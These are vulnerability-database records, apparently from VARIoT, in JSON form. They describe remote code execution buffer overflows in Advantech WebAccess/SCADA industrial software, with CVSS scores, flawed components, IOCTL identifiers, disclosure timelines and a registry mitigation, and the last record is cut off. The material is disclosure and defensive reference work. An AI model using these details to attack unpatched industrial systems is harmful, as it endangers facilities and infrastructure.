Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-545", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-545", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4081", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-545", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ] }, "id": "VAR-201708-1724", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:08:57.618000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-545", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-545", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-545", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D Name Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-545" } ], "trust": 0.7 } }
var-201906-0330
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 81024 RPC call. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AdvantechWebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in AdvantechWebAccess/SCADA version 8.4.0. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0330", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.8, "vendor": "advantech", "version": "8.4.0" }, { "model": "webaccess/scada", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.4.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.4.0" } ], "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005594" } ] }, "cve": "CVE-2019-3954", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2019-3954", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2019-18839", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-155389", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2019-3954", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2019-3954", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2019-3954", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2019-18839", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201906-724", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-155389", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "VULHUB", "id": "VHN-155389" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.0 allows a remote, unauthenticated attacker to execute arbitrary code by sending a crafted IOCTL 81024 RPC call. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. AdvantechWebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in AdvantechWebAccess/SCADA version 8.4.0. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow", "sources": [ { "db": "NVD", "id": "CVE-2019-3954" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "VULHUB", "id": "VHN-155389" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2019-3954", "trust": 3.3 }, { "db": "TENABLE", "id": "TRA-2019-28", "trust": 3.1 }, { "db": "CNNVD", "id": "CNNVD-201906-724", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2019-18839", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2019-005594", "trust": 0.8 }, { "db": "IVD", "id": "FD36FFFD-9D2A-4D51-AC7D-BAA7412A79AD", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-155389", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "VULHUB", "id": "VHN-155389" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "id": "VAR-201906-0330", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "VULHUB", "id": "VHN-155389" } ], "trust": 1.4466745799999998 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" } ] }, "last_update_date": "2024-11-23T22:33:57.134000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "https://www.advantech.co.jp/industrial-automation/webaccess" }, { "title": "Patch for AdvantechWebAccess/SCADA Buffer Overflow Vulnerability (CNVD-2019-18839)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/164439" }, { "title": "Advantech WebAccess/SCADA Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93906" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-119", "trust": 0.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-155389" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "https://www.tenable.com/security/research/tra-2019-28" }, { "trust": 2.0, "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3954" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3954" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "VULHUB", "id": "VHN-155389" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNVD", "id": "CNVD-2019-18839" }, { "db": "VULHUB", "id": "VHN-155389" }, { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" }, { "db": "NVD", "id": "CVE-2019-3954" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-06-21T00:00:00", "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "date": "2019-06-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-18839" }, { "date": "2019-06-19T00:00:00", "db": "VULHUB", "id": "VHN-155389" }, { "date": "2019-06-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "date": "2019-06-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-724" }, { "date": "2019-06-19T00:15:13.360000", "db": "NVD", "id": "CVE-2019-3954" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2019-06-21T00:00:00", "db": "CNVD", "id": "CNVD-2019-18839" }, { "date": "2020-08-24T00:00:00", "db": "VULHUB", "id": "VHN-155389" }, { "date": "2019-06-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "date": "2020-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201906-724" }, { "date": "2024-11-21T04:42:56.187000", "db": "NVD", "id": "CVE-2019-3954" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201906-724" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess/SCADA Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2019-005594" }, { "db": "CNNVD", "id": "CNNVD-201906-724" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "fd36fffd-9d2a-4d51-ac7d-baa7412a79ad" }, { "db": "CNNVD", "id": "CNNVD-201906-724" } ], "trust": 0.8 } }
var-201601-0039
Vulnerability from variot
Multiple heap-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11367 IOCTL in the BwpAlarm subsystem. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 5.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "CNNVD", "id": "CNNVD-201601-330" }, { "db": "NVD", "id": "CVE-2016-0857" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001287" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" } ], "trust": 5.6 }, "cve": "CVE-2016-0857", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2016-0857", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 5.6, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2016-0857", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2016-00435", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "64cfd42c-2351-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-88367", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2016-0857", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2016-0857", "trust": 5.6, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2016-0857", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2016-0857", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2016-00435", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201601-330", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-88367", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "VULHUB", "id": "VHN-88367" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "CNNVD", "id": "CNNVD-201601-330" }, { "db": "NVD", "id": "CVE-2016-0857" } ] }, "description": { "_id": null, "data": "Multiple heap-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x11367 IOCTL in the BwpAlarm subsystem. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2016-0857" }, { "db": "JVNDB", "id": "JVNDB-2016-001287" }, { "db": "ZDI", "id": "ZDI-16-065" }, { "db": "ZDI", "id": "ZDI-16-121" }, { "db": "ZDI", "id": "ZDI-16-066" }, { "db": "ZDI", "id": "ZDI-16-119" }, { "db": "ZDI", "id": "ZDI-16-107" }, { "db": "ZDI", "id": "ZDI-16-064" }, { "db": "ZDI", "id": "ZDI-16-067" }, { "db": "ZDI", "id": "ZDI-16-068" }, { "db": "CNVD", "id": "CNVD-2016-00435" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64cfd42c-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-88367" } ], "trust": 7.74 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-0857", "trust": 9.2 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "ZDI", "id": "ZDI-16-121", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-119", "trust": 1.8 }, { "db": "ZDI", "id": "ZDI-16-107", "trust": 1.8 }, { "db": "CNNVD", "id": "CNNVD-201601-330", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00435", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001287", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3236", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-065", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3178", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3235", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-066", "trust": 0.7 }, { "db": 